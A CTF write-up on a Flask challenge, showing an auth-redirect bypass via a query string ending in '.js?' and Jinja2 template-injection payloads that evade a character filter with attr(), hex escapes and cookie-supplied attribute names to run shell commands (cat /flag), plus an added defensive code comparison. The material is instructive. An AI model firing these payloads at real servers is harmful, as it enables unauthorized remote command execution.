0x00 Preface
Some supplementary Flask basics first. From the docs:
request.full_path
Requested path as unicode, including the query string.
That is, the request path including the query string.
A more intuitive view:
0x01 Reproduction
The HTML comment carries a hint:
<div class="center-content error">
<h3>you need login</h3>
<!--/admin-->
<!--/static.js-->
<!--if not request.full_path.endswith(".js?"):
    if not request.full_path.startswith("/login"):
        return redirect("login")-->
</div>
Go to /admin and bypass the redirect.
Ugh, I was so bad back then that I didn't realize simply adding a query parameter gets you through:
/admin?a=.js?
hello admin
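As an added example (my own code, not from the challenge or the writeup), here is the check reconstructed from the HTML comment beside a version that decides on the path component alone, so the query string cannot influence it; `PUBLIC_PATHS`, `hardened_needs_login` and the sample paths are assumptions, constructed in the `path?query` format that Flask's `request.full_path` returns.

```python
from urllib.parse import urlsplit

# Flask/Werkzeug's request.full_path is path + "?" + query string, so a bare
# GET /admin has full_path "/admin?" and GET /static.js has "/static.js?".
# The strings used below are constructed samples in that format; no Flask needed.


def weak_needs_login(full_path: str) -> bool:
    """Reconstruction of the challenge's check from the HTML comment.

    Returns True when the request would be redirected to /login.  Because the
    suffix test runs on full_path, a query string ending in ".js?" also passes.
    """
    if not full_path.endswith(".js?"):
        if not full_path.startswith("/login"):
            return True
    return False


# Hypothetical allowlist for the hardened version: exact public paths plus
# public route prefixes, matched on whole path segments only.
PUBLIC_PATHS = frozenset({"/static.js"})
PUBLIC_PREFIXES = ("/login",)


def hardened_needs_login(full_path: str) -> bool:
    """Decide on the path component alone; the query string cannot change it.

    In a real Flask app use request.path here (or better, a login-required
    decorator on the protected view) instead of parsing full_path.
    """
    path = urlsplit(full_path).path
    if path in PUBLIC_PATHS:
        return False
    for prefix in PUBLIC_PREFIXES:
        if path == prefix or path.startswith(prefix + "/"):
            return False
    return True


if __name__ == "__main__":
    for sample in ("/admin?", "/admin?a=.js?", "/static.js?", "/login?next=/admin", "/loginx?"):
        print(f"{sample:20} weak={weak_needs_login(sample)!s:5} "
              f"hardened={hardened_needs_login(sample)}")
```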
<!--admin/?name=-->
Payload test:
SSTI is present.
The usual payloads are banned.
Fuzz it to see what is filtered.
By the looks of it, the filter blocks:
- []
- __
Later I found out that subclasses is banned too.
Time to learn some advanced SSTI; 羽师傅's post is excellent:
https://blog.youkuaiyun.com/miuzzx/article/details/110220425
Thinking it over: attr plus hex encoding can bypass the filter.
Use __getitem__ for indexing.
A summary of SSTI command execution:
https://blog.youkuaiyun.com/chizhaji/article/details/113834092
Payload (remember to replace spaces with +):
/admin?name={{()|attr("\x5f\x5fclass\x5f\x5f")|attr("\x5f\x5fbase\x5f\x5f")|attr("\x5f\x5fsub"+"classes\x5f\x5f")()|attr("\x5f\x5fgetitem\x5f\x5f")(118)|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")('popen')('cat+/flag')|attr("read")()}}&a=.js?
Alternative solution
I saw many bigshots use request.cookies.xx and pass the parameters via cookies.
E.g. the original payload:
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
Bypass payload + Cookie:
?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
References
https://blog.youkuaiyun.com/chizhaji/article/details/113834092
https://blog.youkuaiyun.com/miuzzx/article/details/110220425
0x02 Rethink
Keep practicing.